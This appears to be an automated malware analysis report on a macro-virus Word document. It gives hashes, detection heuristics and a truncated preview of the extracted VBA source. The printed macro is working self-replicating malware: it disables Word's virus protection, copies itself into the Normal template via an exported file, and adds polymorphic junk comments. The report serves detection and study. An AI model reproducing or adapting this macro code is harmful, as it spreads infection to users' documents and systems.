Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d645ecb107fd0abe…

MALICIOUS

Office (OLE)

37.0 KB Created: 1998-10-06 05:14:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 08986e6f716def367566ee3f73ceda78 SHA-1: ac0d33daa8b277025033b33f412c0df9c79a4107 SHA-256: d645ecb107fd0abe57d3faf0967fefcbb83509a481f7da29716a6b715560fc7a
262 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The sample contains legacy WordBasic and VBA macros, including AutoOpen and Auto_Close, indicating a malicious document. The AutoOpen macro attempts to disable virus protection and export a component to 'c:\Seed$.dll', suggesting it acts as a dropper for a secondary payload. The document body fabricates a story about managing a mailing list to mask the malicious intent.

Heuristics 6

  • ClamAV: Doc.Trojan.Class-37 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Class-37
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.cannabisculture.com� In document text (OLE body)
    • http://www.Microsoft.com�In document text (OLE body)
    • http://www.cannabisculture.comIn document text (OLE body)
    • http://www.Microsoft.comIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19621 bytes
SHA-256: 7a02d6e37e42e1d9fbab6491957c10bd1a6a8dd1123bb761487bc5809e1be14f
Detection
ClamAV: Doc.Trojan.Class-31
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
'21309284529365719726447.793225708578E+20213092845293657197264421309284529
Randomize
'6799816521429861435612.92297889160166E+206799816521429861435616799816521
s = 0: r = 0
'4109539840076720081003.15284229397527E+2041095398400767200810041095398400
On Error GoTo 87
'4427837764408136965761.8071642698765E+204427837764408136965764427837764
Options.VirusProtection = False
'13773369695005958411.30855217938316E+181377336969500595841137733696
Options.SaveNormalPrompt = False
'26300406276566706591361.49046135920551E+21263004062765667065913626300406276
Options.ConfirmConversions = False
'4586133841535959540642.45798218673592E+204586133841535959540644586133841
fx = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
'241398369003237840367.81609381986373E+182413983690032378403624139836900
xf = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
'10445862025775009921008.09564670277215E+20104458620257750099210010445862025
If xf > 90 And fx > 0 Then GoTo 87
'10663660225111576969001.18981888635136E+20106636602251115769690010663660225
If xf < 90 Then
'184358596935365619616.51995600979873E+18184358596935365619611843585969
    Set xs = NormalTemplate.VBProject.VBComponents.Item(1)
'38833825969463351455361.79937097799331E+21388338259694633514553638833825969
    ActiveDocument.VBProject.VBComponents.Item(1).Name = xs.Name
'4339513922516555133447.18412320517253E+1943395139225165551334443395139225
    ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\Seed$.dll"
'4096896049210807168648.63655056302093E+194096896049210807168644096896049
End If
'155955139242227257763.47352294084171E+181559551392422272577615595513924
If fx = 0 Then Set xs = ActiveDocument.VBProject.VBComponents.Item(1)
'25679101009445429467041.14382282765052E+21256791010094454294670425679101009
k = Int(Rnd(1) * 100) + 1
'2274145344203678566564.63194663815018E+192274145344203678566562274145344
If k = 99 Then ActiveWindow.WindowState = wdWindowStateMinimize: ActiveDocument.FollowHyperlink Address:="http://www.cannabisculture.com", NewWindow:=False, AddHistory:=False, ExtraInfo:=Chr(67) + Chr(76) + Chr(65) + Chr(83) + Chr(83) + Chr(47) + Chr(83) + Chr(69) + Chr(69) + Chr(68)
'2398161960012448900892.98544805582081E+1923981619600124489008923981619600
l = Int(Rnd(1) * 75) + 1
'701741290040194332012.82060223953857E+19701741290040194332017017412900
If l = 74 Then ActiveWindow.WindowState = wdWindowStateMinimize: ActiveDocument.FollowHyperlink Address:="http://www.Microsoft.com", NewWindow:=False, AddHistory:=False, ExtraInfo:=Chr(67) + Chr(76) + Chr(65) + Chr(83) + Chr(83) + Chr(47) + Chr(83) + Chr(69) + Chr(69) + Chr(68)
'279993289711934460411.99336871122636E+1927999328971193446041279993289
m = Int(Rnd(1) * 50) + 1
'3333910810062043978242.06849089749741E+2033339108100620439782433339108100
If m = 49 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(80) + Chr(82) + Chr(79) + Chr(32) + Chr(86) + Chr(105) + Chr(82) + Chr(117) + Chr(83)
'1755386508170965460811.24571812446973E+2017553865081709654608117553865081
n = Int(Rnd(1) * 25) + 1
'31497020676147093235244.63299867165401E+20314970206761470932352431497020676
If n = 24 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(67) + Chr(76) + Chr(65) + Chr(83) + Chr(83) + Chr(32) + Chr(83) + Chr(69) + Chr(69) + Chr(68)
'2256630016407244508099.19000180807049E+192256630016407244508092256630016
xs.codemodule.AddFromFile ("c:\Seed$.dll")
'6729084961497575480963.34822768589028E+206729084961497575480966729084961
With xs.codemodule
'12935650225527492275846.82345557665546E+20129356502255274922758412935650225
    For poly = 1 To 4
'875686464395071276963.45958569549067E+1987568646439507127696875686464
    .deletelines 1
'16577077504116001516161.9229661239658
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.